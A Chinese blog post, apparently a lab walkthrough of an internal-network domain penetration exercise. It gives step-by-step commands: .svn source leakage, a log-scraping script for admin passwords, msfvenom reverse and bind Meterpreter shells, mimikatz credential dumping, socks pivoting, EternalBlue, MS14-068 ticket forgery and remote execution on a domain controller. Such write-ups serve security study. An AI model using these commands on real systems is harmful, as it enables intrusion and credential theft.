<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Noto Serif SC:300,300italic,400,400italic,700,700italic|Source Code Pro:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/hacker.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/hacker.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/hacker.png?v=5.1.4">


  <link rel="mask-icon" href="/images/hacker.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="暗月," />










<meta name="description" content="总结通过暗月六的项目，了解了域内的基本知识，掌握了mimikatz工具的基本使用，学习了 Kerberos 的简单攻击（包括 PAC 攻击和黄金票据的生成上传），同时也接触了 Metasploit 的更多模块，最后还尝试了使用 CS 进行域渗透。  参考文章：内网横向移动：Kerberos认证与(哈希)票据传递攻击 - FreeBuf网络安全行业门户  最后也是跟着暗月佬拿下了一台Web主机和一台">
<meta property="og:type" content="article">
<meta property="og:title" content="初探内网域渗透">
<meta property="og:url" content="https://pursuezhou.github.io/2023/06/26/Penetration/%E6%9A%97%E6%9C%88%E9%A1%B9%E7%9B%AE%E5%85%AD/index.html">
<meta property="og:site_name" content="Pursue">
<meta property="og:description" content="总结通过暗月六的项目，了解了域内的基本知识，掌握了mimikatz工具的基本使用，学习了 Kerberos 的简单攻击（包括 PAC 攻击和黄金票据的生成上传），同时也接触了 Metasploit 的更多模块，最后还尝试了使用 CS 进行域渗透。  参考文章：内网横向移动：Kerberos认证与(哈希)票据传递攻击 - FreeBuf网络安全行业门户  最后也是跟着暗月佬拿下了一台Web主机和一台">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626132522994.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530163822259.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530195835505.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200008802.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200053976.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200120533.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530204935809.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530205459255.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624150841920.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531164357068.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531165056002.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624160243731.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531183749306.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624184812994.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626103749186.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626103854117.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626125943601.png">
<meta property="article:published_time" content="2023-06-25T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-13T11:55:50.981Z">
<meta property="article:author" content="Pursue">
<meta property="article:tag" content="暗月">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626132522994.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://pursuezhou.github.io/2023/06/26/Penetration/暗月项目六/"/>





  <title>初探内网域渗透 | Pursue</title>
  








<meta name="generator" content="Hexo 7.1.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Pursue</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Better to light one candle than to curse the darkness.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://pursuezhou.github.io/2023/06/26/Penetration/%E6%9A%97%E6%9C%88%E9%A1%B9%E7%9B%AE%E5%85%AD/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/wechat.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pursue">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">初探内网域渗透</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2023-06-26T00:00:00+08:00">
                2023-06-26
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Penetration/" itemprop="url" rel="index">
                    <span itemprop="name">Penetration</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过暗月六的项目，了解了域内的基本知识，掌握了<code>mimikatz</code>工具的基本使用，学习了 Kerberos 的简单攻击（包括 PAC 攻击和黄金票据的生成上传），同时也接触了 Metasploit 的更多模块，最后还尝试了使用 CS 进行域渗透。</p>
<blockquote>
<p>参考文章：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/245872.html">内网横向移动：Kerberos认证与(哈希)票据传递攻击 - FreeBuf网络安全行业门户</a></p>
</blockquote>
<p>最后也是跟着暗月佬拿下了一台Web主机和一台DC。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626132522994.png" alt="image-20230626132522994"></p>
<span id="more"></span>

<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo masscan -p 1-65535 192.168.8.139 --rate=10000</span><br><span class="line">nmap -p 49152,3389,49153,49159,3306,80,47001,139,49155,49154,135,49156,445 -sC -A 192.168.8.139</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530163822259.png" alt="image-20230530163822259"></p>
<h2 id="网站测试"><a href="#网站测试" class="headerlink" title="网站测试"></a>网站测试</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">whatweb http://www.webhack123.com/</span><br><span class="line">dirsearch -u &quot;http://www.webhack123.com/&quot; -e * -x 400-499 -t 50</span><br></pre></td></tr></table></figure>

<p>发现存在<code>.svn</code>泄露，访问 &#x2F;.svn&#x2F;entries 或者是 &#x2F;.svn&#x2F;wc.db 文件可以获得服务器源码等信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">利用工具得到网站源码</span></span><br><span class="line">git clone https://github.com/kost/dvcs-ripper.git</span><br><span class="line">./rip-svn.pl -v -u http://www.webhack123.com/.svn/</span><br></pre></td></tr></table></figure>

<p>发现日志文件，thinkphp 低版本在会记录修改密码的日志，所以可以找到管理员的密码。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530195835505.png" alt="image-20230530195835505"></p>
<p>本来以为已经找到了密码，解一下是 123456，但是看完视频才发现通过 .svn 恢复的日志文件不全，存在更新的。学习暗月佬写了一个脚本来收集相关的日志记录，找到了最新的密码记录。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200008802.png" alt="image-20230530200008802"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://www.webhack123.com/App/Runtime/Logs/&quot;</span></span><br><span class="line">l = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_url</span>(<span class="params">year</span>):</span><br><span class="line">    <span class="keyword">for</span> mou <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">12</span>):</span><br><span class="line">        <span class="keyword">for</span> day <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">            <span class="keyword">if</span> mou &lt; <span class="number">10</span> :</span><br><span class="line">                <span class="keyword">if</span> day &lt; <span class="number">10</span> :</span><br><span class="line">                    tmp = url + <span class="built_in">str</span>(year) + <span class="string">&quot;_0&quot;</span> + <span class="built_in">str</span>(mou) + <span class="string">&quot;_0&quot;</span> + <span class="built_in">str</span>(day) + <span class="string">&quot;.log&quot;</span></span><br><span class="line">                <span class="keyword">else</span> :</span><br><span class="line">                    tmp = url + <span class="built_in">str</span>(year) + <span class="string">&quot;_0&quot;</span> + <span class="built_in">str</span>(mou) + <span class="string">&quot;_&quot;</span> + <span class="built_in">str</span>(day) + <span class="string">&quot;.log&quot;</span></span><br><span class="line">            <span class="keyword">else</span> :</span><br><span class="line">                <span class="keyword">if</span> day &lt; <span class="number">10</span> :</span><br><span class="line">                    tmp = url + <span class="built_in">str</span>(year) + <span class="string">&quot;0&quot;</span> + <span class="built_in">str</span>(mou) + <span class="string">&quot;_0&quot;</span> + <span class="built_in">str</span>(day) + <span class="string">&quot;.log&quot;</span></span><br><span class="line">                <span class="keyword">else</span> :</span><br><span class="line">                    tmp = url + <span class="built_in">str</span>(year) + <span class="string">&quot;0&quot;</span> + <span class="built_in">str</span>(mou) + <span class="string">&quot;0&quot;</span> + <span class="built_in">str</span>(day) + <span class="string">&quot;.log&quot;</span></span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span> tmp <span class="keyword">not</span> <span class="keyword">in</span> l:</span><br><span class="line">                rs = requests.get(tmp)</span><br><span class="line">                <span class="keyword">if</span> rs.status_code == <span class="number">200</span>:</span><br><span class="line">                    l.append(tmp)</span><br><span class="line">                    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;db_log.txt&quot;</span>, <span class="string">&quot;a&quot;</span>, encoding = <span class="string">&quot;utf-8&quot;</span>) <span class="keyword">as</span> f :</span><br><span class="line">                        f.write(rs.text)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> l:</span><br><span class="line">        <span class="built_in">print</span>(x)</span><br><span class="line"></span><br><span class="line">get_url(<span class="number">19</span>)</span><br><span class="line">get_url(<span class="number">20</span>)</span><br><span class="line">get_url(<span class="number">21</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200053976.png" alt="image-20230530200053976"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530200120533.png" alt="image-20230530200120533"></p>
<p>学习一下绑定 hosts 碰后台的技巧。为了安全起见，目标会在自己的服务器的 hosts 上绑定一个后台的子域名，而非在公网上申请一个后台的子域名，这样只有他自己的服务器能够访问，而攻击者不能访问到。但是当我们不断修改攻击机上的 hosts 文件，只要能够成功找到目标 IP，那么就实现了子域名的碰撞。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/fofapro/Hosts_scan">fofapro&#x2F;Hosts_scan: 这是一个用于IP和域名碰撞匹配访问的小工具，旨意用来匹配出渗透过程中需要绑定hosts才能访问的弱主机或内部系统。 (github.com)</a></p>
<p>由于上述工具的测试体量太少了，自己写了一个生成 host 的脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">l = sys.argv</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(l) != <span class="number">3</span> :</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;&#x27;&#x27;[*]Usage: python get_ip.py &lt;your domain&gt; &lt;your wordlist&gt;&#x27;&#x27;&#x27;</span>)</span><br><span class="line">    sys.exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">domain = l[<span class="number">1</span>]</span><br><span class="line">wordlist = l[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(wordlist, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;host.txt&quot;</span>, <span class="string">&quot;w&quot;</span>) <span class="keyword">as</span> rs:</span><br><span class="line">        <span class="keyword">for</span> line <span class="keyword">in</span> f:</span><br><span class="line">            line = line.strip()</span><br><span class="line">            tmp = line + <span class="string">&#x27;.&#x27;</span> + domain</span><br><span class="line">            rs.write(tmp + <span class="string">&quot;\n&quot;</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python IP_hosts_scan_multithreading.py</span><br><span class="line">grep -v 403 ./hosts_ok.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530204935809.png" alt="image-20230530204935809"></p>
<p>成功找到了后台的域名<code>admin.webhack123.com</code>，利用之前日志文件里的用户和密码进入后台。</p>
<p>设置上传文件类型直接成功上传文件。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230530205459255.png" alt="image-20230530205459255"></p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624150841920.png" alt="image-20230624150841920"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.129 lport=5555 -f exe &gt; shell.exe</span><br><span class="line"></span><br><span class="line">msf6 &gt; use exploit/multi/handler</span><br><span class="line">msf6 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(multi/handler) &gt; set lhost 192.168.8.139</span><br><span class="line">msf6 exploit(multi/handler) &gt; set lport 5555</span><br><span class="line">msf6 exploit(multi/handler) &gt; run</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; getuid</span><br><span class="line">meterpreter &gt; ps</span><br><span class="line">meterpreter &gt; migrate 476</span><br><span class="line"></span><br><span class="line">meterpreter &gt; hashdump</span><br><span class="line">meterpreter &gt; load mimikatz</span><br><span class="line">meterpreter &gt; creds_all</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531164357068.png" alt="image-20230531164357068"></p>
<h2 id="内网域渗透"><a href="#内网域渗透" class="headerlink" title="内网域渗透"></a>内网域渗透</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; shell</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;chcp 65001</span><br><span class="line">C:\Windows\system32&gt;ipconfig /all</span><br></pre></td></tr></table></figure>

<p>发现域环境，一般域控和 dns 都在同一个服务器上。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531165056002.png" alt="image-20230531165056002"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run post/windows/gather/enum_domain		# 寻找域控</span><br><span class="line">meterpreter &gt; run post/windows/gather/enum_logged_on_users		# 查找登录过的用户信息</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;net config workstation		# 查看是否在域环境内</span><br><span class="line">C:\Windows\system32&gt;net view		# 遍历信任主机</span><br><span class="line">C:\Windows\system32&gt;net time /domain		# 查看域控时间</span><br><span class="line">C:\Windows\system32&gt;net view /domain		# 查看域</span><br><span class="line">C:\Windows\system32&gt;net group /domain		# 查看域组</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624160243731.png" alt="image-20230624160243731"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf6 exploit(multi/handler) &gt; use auxiliary/server/socks_proxy</span><br><span class="line">msf6 auxiliary(server/socks_proxy) &gt; run</span><br><span class="line">msf6 auxiliary(server/socks_proxy) &gt; jobs</span><br><span class="line"></span><br><span class="line">meterpreter &gt; run autoroute -s 10.10.10.0/24</span><br><span class="line"></span><br><span class="line">sudo proxychains4 nmap -sT -Pn 10.10.10.149</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230531183749306.png" alt="image-20230531183749306"></p>
<p>发现 445 端口，尝试永恒之蓝，但是无法攻击成功。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(server/socks_proxy) &gt; use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; set rhosts 10.10.10.149</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; set payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; set lport 8888</span><br><span class="line">msf6 exploit(windows/smb/ms17_010_eternalblue) &gt; run</span><br></pre></td></tr></table></figure>

<p>PAC 是用来验证 Client 的访问权限的，它会被放在 TGT 里发送给 Client，然后由 Client 发送给 TGS。MS14-068 是密钥分发中心（KDC）服务中的漏洞。它允许经过身份验证的用户在其 Kerberos 票证（TGT）中<strong>插入任意的 PAC</strong>（表示所有用户权限的结构）。<strong>普通用户可以通过呈现具有改变了 PAC 的 Kerberos TGT 来获得票证，进而伪造票据获得管理员权限。</strong></p>
<p>主要满足三个条件：</p>
<ul>
<li>域控没有打 MS14-068 的补丁(KB3011780)</li>
<li>拿下一台加入域的计算机</li>
<li>有这台域内计算机的域用户密码和 SID</li>
</ul>
<p>在这里，存在主机为 web，存在域普通用户为 web，web 主机的系统管理员为 administrator，两者的密码可能相等。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">开启远程桌面，尝试 WEB\administrator 和 hackbox\web 的密码是否相同</span></span><br><span class="line">meterpreter &gt; run post/windows/manage/enable_rdp </span><br><span class="line">rdesktop 192.168.8.139</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">创建票据</span></span><br><span class="line">ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456</span><br><span class="line"></span><br><span class="line">meterpreter &gt; load kiwi</span><br><span class="line">meterpreter &gt; kerberos_ticket_purge		# 清理票据</span><br><span class="line">meterpreter &gt; kerberos_ticket_list		# 查看当前凭证</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">不过 meterpreter 中的 kiwi 模块没有更新票据的功能</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/ParrotSec/mimikatz">GitHub - ParrotSec&#x2F;mimikatz</a></p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug				# 提升至 DebugPrivilege 权限</span><br><span class="line">sekurlsa::logonpasswords			# 导出用户凭据</span><br><span class="line">sekurlsa::wdigest</span><br><span class="line"></span><br><span class="line">kerberos::list					# 列出用户票据</span><br><span class="line">kerberos::purge					# 清除系统中的票据</span><br><span class="line">kerberos::ptc &lt;path&gt;				# 导入票据到系统中</span><br></pre></td></tr></table></figure>

<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::ptc ./TGT_web@hackbox.com.ccache</span><br></pre></td></tr></table></figure>

<p>最终成功访问到了域控。</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230624184812994.png" alt="image-20230624184812994"></p>
<p>接下来就是拿到域控的 shell。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe &gt; bind.exe		# 正向</span><br><span class="line"></span><br><span class="line">meterpreter &gt; upload /home/pursue/anyue/practice6/bind.exe</span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">C:\Users\Administrator\Desktop&gt;copy bind.exe \\dc\c$\</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">AT 命令可在指定时间和日期、在指定计算机上运行命令和程序（仅当计划服务正在运行时，才能使用 at）</span></span><br><span class="line">C:\Users\Administrator\Desktop&gt;net time \\dc		# 查看 \\dc 时间</span><br><span class="line">C:\Users\Administrator\Desktop&gt;at \\dc 19:10:00 c:/bind.exe			# 创造任务执行</span><br><span class="line">C:\Users\Administrator\Desktop&gt;at \\dc			# 查看任务计划</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626103749186.png" alt="image-20230626103749186"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf6 auxiliary(server/socks_proxy) &gt; use exploit/multi/handler</span><br><span class="line">msf6 exploit(multi/handler) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">msf6 exploit(multi/handler) &gt; set lport 13777</span><br><span class="line">msf6 exploit(multi/handler) &gt; set rhost 10.10.10.149</span><br><span class="line">msf6 exploit(multi/handler) &gt; run</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230626103854117.png" alt="image-20230626103854117"></p>
